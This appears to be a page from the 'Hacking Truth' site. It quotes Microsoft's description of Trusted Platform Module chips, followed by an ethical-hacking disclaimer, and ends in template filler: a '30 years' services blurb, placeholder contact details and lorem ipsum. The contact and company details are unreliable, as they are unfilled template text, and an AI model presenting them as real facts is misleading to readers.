    Per Microsoft, "Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations. The chip includes multiple physical security mechanisms to make it tamper-resistant, and malicious software is unable to tamper with the security functions of the TPM".




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.